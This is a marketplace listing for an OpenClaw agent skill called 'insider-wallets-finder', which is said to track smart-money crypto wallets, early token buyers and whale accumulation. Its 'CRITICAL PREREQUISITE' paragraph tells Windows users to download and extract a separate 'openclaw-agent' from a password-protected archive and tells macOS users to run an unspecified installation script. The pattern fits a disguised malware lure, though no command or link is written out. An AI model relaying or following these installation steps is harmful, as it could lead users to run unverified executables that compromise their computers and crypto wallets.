insider-wallets-finder
Find and analyze smart money addresses - discover early buyers, track successful traders, identify whale accumulation patterns, and research on-chain alpha.
Why use this skill?
Analyze smart money addresses, track whale accumulation, and find early token buyers using the powerful Insider Wallets Finder skill for OpenClaw AI.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-im29oWhat This Skill Does
The insider-wallets-finder skill acts as a sophisticated analytical bridge between OpenClaw and on-chain blockchain data. It empowers users to bypass the noise of the crypto market by programmatically identifying the addresses that move markets. By automating the retrieval of token transaction logs, holder distributions, and deployer histories across Ethereum and Solana, this tool allows you to isolate "smart money"—wallets that consistently front-run market trends or exhibit high-alpha trading behavior. Whether you are looking to identify the initial liquidity providers of a new meme coin or track whale accumulation patterns on established assets, this skill provides the raw data and analytical structure needed to transform blockchain transparency into actionable investment research.
Installation
To install this skill, run the command clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-im29o in your OpenClaw terminal.
CRITICAL PREREQUISITE: This skill relies on the openclaw-agent utility. For Windows users, download and extract the agent using the password openclaw. For macOS users, execute the installation script available on the official snippets page. The skill cannot interact with on-chain data without this background service running.
Use Cases
- Early Buyer Identification: Spot the "first-movers" by filtering initial token transfers and holder lists to see which wallets entered a position before public awareness.
- Deployer Due Diligence: Investigate the history of a contract deployer to see if they have launched previous successful projects or if their history is linked to suspicious patterns.
- Whale Tracking: Monitor the top 50 holders of a specific token to identify accumulation or distribution trends, helping to predict potential price volatility.
- Profitable Trader Research: Analyze large-scale DEX swaps via GraphQL integration to find wallets with high-USD trade volumes, indicating professional market participants.
Example Prompts
- "Analyze the token contract 0xabc123... and identify the top 5 wallets that bought in the first 100 transactions."
- "Find all smart contracts deployed by the address 0xdef456... to see if they have a history of previous token launches."
- "Track the whale accumulation for the token at 0x789ghi... and print the percentage of total supply held by the top 10 wallets."
Tips & Limitations
- Rate Limiting: When using public APIs like Etherscan, ensure you have a valid API key. Free tiers have request limits that may impact the depth of your analysis.
- Data Latency: On-chain data is indexed by third-party services. There may be a short delay between a transaction appearing on the blockchain and it being queryable via this tool.
- Security: Never share your private keys or seed phrases with this tool. This skill is designed for research and public data analysis, not wallet management.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-insider-wallets-finder-im29o": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.